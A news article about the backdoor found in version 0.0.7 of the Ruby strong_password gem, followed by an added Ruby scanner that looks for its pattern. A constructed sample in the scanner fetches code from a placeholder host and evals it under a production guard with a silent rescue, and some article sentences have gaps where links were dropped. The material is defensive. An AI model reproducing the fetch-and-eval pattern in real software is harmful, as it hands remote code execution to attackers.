Backdoor discovered in Ruby strong_password library

An eagle-eyed developer has discovered a backdoor recently sneaked into a library (or ‘gem’) used by Ruby on Rails (RoR) web apps to check password strength.

While the Ruby scripting language and RoR aren’t as popular as they once were, they’re still embedded in numerous enterprise development environments, many of which might have used the default library, strong_password, in its infected version 0.0.7.

The discovery came about after Epion Health developer, Tute Costa, noticed something unusual when carefully updating a family of libraries used by his company’s dev to fix bugs and security vulnerabilities.

When he looked at the strong_password gem on, he couldn’t locate a changelog explaining how it got to the updated version from 0.0.6, an event which happened on 25 June 2019.

The previous GitHub version had been updated in October 2018.

Comparing the two versions, he noticed the mystery 0.0.7 version embedded a download link which:

Fetches and runs the code stored in a, only if running in production, with an empty exception handling that ignores any error it may raise.

A close shave, then.
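The three traits the article describes in the injected code (remote code fetched at runtime and evaluated, only under a production check, inside an exception handler that discards every error) are easy to look for when reviewing a gem update. The following heuristic scanner is an added example, not code from the article or from the strong_password project; the two source snippets it checks are constructed stand-ins, and the URL in them is a placeholder.

```ruby
# Line-oriented heuristics for the backdoor shape described above.
TRAITS = {
  remote_fetch:     /\b(?:open-uri|URI\.open|Net::HTTP|open\(\s*["']https?:)/,
  dynamic_eval:     /\b(?:eval|instance_eval|class_eval|module_eval)\b/,
  production_guard: /(?:Rails\.env\.production\?|RAILS_ENV.*production)/,
}.freeze

# Returns a hash of trait => [line numbers] for the given Ruby source text.
def scan_source(src)
  lines = src.lines.map(&:rstrip)
  hits  = Hash.new { |h, k| h[k] = [] }
  lines.each_with_index do |line, i|
    num = i + 1
    TRAITS.each { |trait, re| hits[trait] << num if line =~ re }
    next unless line =~ /^\s*rescue\b/
    # An "empty" rescue: the next non-blank line closes the handler, so the
    # error is neither logged nor re-raised (the trait the article calls out).
    following = lines[(i + 1)..-1].find { |l| !l.strip.empty? }
    hits[:silent_rescue] << num if following && following.strip =~ /\A(?:end|nil)\z/
  end
  hits
end

# Flag only when fetch, eval and a silent rescue all occur together.
def suspicious?(src)
  h = scan_source(src)
  %i[remote_fetch dynamic_eval silent_rescue].all? { |t| !h[t].empty? }
end

# Constructed sample: ordinary gem code with a proper rescue body.
BENIGN = <<~'RUBY'
  class StrengthChecker
    def strong?(password)
      password.length >= 12
    rescue ArgumentError => e
      warn "bad input: #{e.message}"
      false
    end
  end
RUBY

# Constructed sample mirroring the described shape (placeholder URL only).
SUSPECT = <<~'RUBY'
  # constructed stand-in for the shape the article describes
  begin
    if Rails.env.production?
      require "open-uri"
      eval(URI.open("https://example.invalid/payload").read)
    end
  rescue Exception
  end
RUBY
```

Run `suspicious?` over each `.rb` file of a freshly downloaded gem (or over a diff between two versions) and review any file it flags by hand; the heuristics are deliberately loose, so treat a hit as a prompt for review, not a verdict.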